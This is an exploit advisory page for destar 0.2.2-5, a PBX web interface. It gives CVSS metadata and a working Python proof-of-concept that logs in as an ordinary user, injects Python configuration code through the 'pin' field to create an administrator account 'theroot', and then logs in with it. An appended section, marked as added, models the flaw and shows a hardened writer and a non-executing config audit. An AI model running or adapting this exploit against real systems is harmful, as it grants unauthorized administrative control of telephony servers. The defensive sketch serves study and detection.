destar 0.2.2-5 Arbitrary Add Admin User Exploit

2009-03-30 / 2009-03-31
Credit: Enero
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/python
#
# Exploit for destar 0.2.2-5, tested on Linux Debian
#
# Bug found and exploit coded by a non root user
# http://nonroot.blogspot.com/
#
# January 2008
#
# This is a PoC, please use it just for learning how to exploit something
#
# use: $python ./exploit_code.py
#
# required: urllib, sys and re
#
import urllib
import sys,re

print "Target host: i.e: http://127.0.0.1:8080/"
host=raw_input("Target host ( include http and /): ")
user=raw_input("A normal user for destar:")
password=raw_input("A normal password for destar:")
null=""
print "trying ..."
loggin = urllib.urlencode({'name': user, 'pw': password})
attack = urllib.urlencode({'cfim': null, 'cfbs': null, 'cfto': null,
    'dsec' : '45', 'vmim' : 'yes','vmbs' : 'yes', 'vmu' : 'yes',
    'pin' : '1234,) ; CfgOptUser(name="theroot",secret="theroot",pc="200.75.43.187",phone="agent1",pbx="pbx1",level="4",language="en",) ; CfgPhoneSip(pbx="pbx1000",name="OpenBSD-Agent",secret="imsecure",ext= "2999",dtmfmode = "rfc2833",enablecallgroup = True,callgroup = "1",queues="queue1",panel= True' })
response= urllib.urlopen(host+"login/", loggin)
data=response.read()
lookup=re.compile("'User'").search
match=lookup(data)
if match:
    print user,"logged, now trying exploit"
else:
    print "Password invalid, try again."
    sys.exit(2)
response= urllib.urlopen(host+"user/settings/", attack)
if response:
    print "ok, attack was done, now i will try loggin like 'theroot'"
    user='theroot'
    password='theroot'
    loggin = urllib.urlencode({'name': user, 'pw': password})
    response= urllib.urlopen(host+"login/", loggin)
    data=response.read()
    lookup=re.compile("'Programmer'").search
    match=lookup(data)
    if match:
        print "Exploit ok. try: ",host+"/user/info"
    else:
        print "Exploit failed, sorry, maybe you need that the sysadmin restart destar, be patient!"
        sys.exit(2)
else:
    print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
    sys.exit(2)
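
Added example (not part of the original advisory and not destar's own code): the shape of the pin value above suggests that form fields end up verbatim inside a Python-syntax configuration file, so this sketch models that flaw next to a hardened writer and a config audit that never executes the file. The functions render_unsafe, render_safe and parse_entries, the digits-only PIN policy and the sample values are assumptions made for illustration.

```python
import ast
import re

PIN_RE = re.compile(r"[0-9]{1,16}")  # assumed policy: a PIN is 1-16 digits

def render_unsafe(name, pin):
    # Modelled flaw (assumption): the form value is pasted verbatim into
    # Python source, so it can close the call and start a new statement.
    return 'CfgOptUser(name="%s",pin=%s,)' % (name, pin)

def render_safe(name, pin):
    # Allow-list the PIN, then emit every value with repr() so it can only
    # ever be read back as a string literal, never as code.
    if not PIN_RE.fullmatch(pin):
        raise ValueError("pin must be 1-16 digits")
    return "CfgOptUser(name=%r,pin=%r,)" % (name, pin)

def parse_entries(config_text):
    # Audit helper: list (callee, kwargs) for each statement WITHOUT
    # executing the file. Anything that is not a plain call with literal
    # keyword values is rejected with ValueError.
    entries = []
    for stmt in ast.parse(config_text).body:
        call = stmt.value if isinstance(stmt, ast.Expr) else None
        if (not isinstance(call, ast.Call)
                or not isinstance(call.func, ast.Name) or call.args):
            raise ValueError("unexpected statement at line %d" % stmt.lineno)
        kwargs = {k.arg: ast.literal_eval(k.value) for k in call.keywords}
        entries.append((call.func.id, kwargs))
    return entries

# Constructed input in the shape of the payload above (not a real account).
CONSTRUCTED_PIN = '1234,) ; CfgOptUser(name="injected",level="4"'

if __name__ == "__main__":
    # Unsafe writer: one settings update yields two config entries.
    print(parse_entries(render_unsafe("alice", CONSTRUCTED_PIN)))
    # Safe writer: exactly one entry, all values plain strings.
    print(parse_entries(render_safe("alice", "1234")))
```

Running parse_entries over an existing configuration file and comparing the returned user entries against the expected account list is a quick way to spot entries that were not created through the normal administration path.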

References:

http://www.milw0rm.com/exploits/5305


Copyright 2024, cxsecurity.com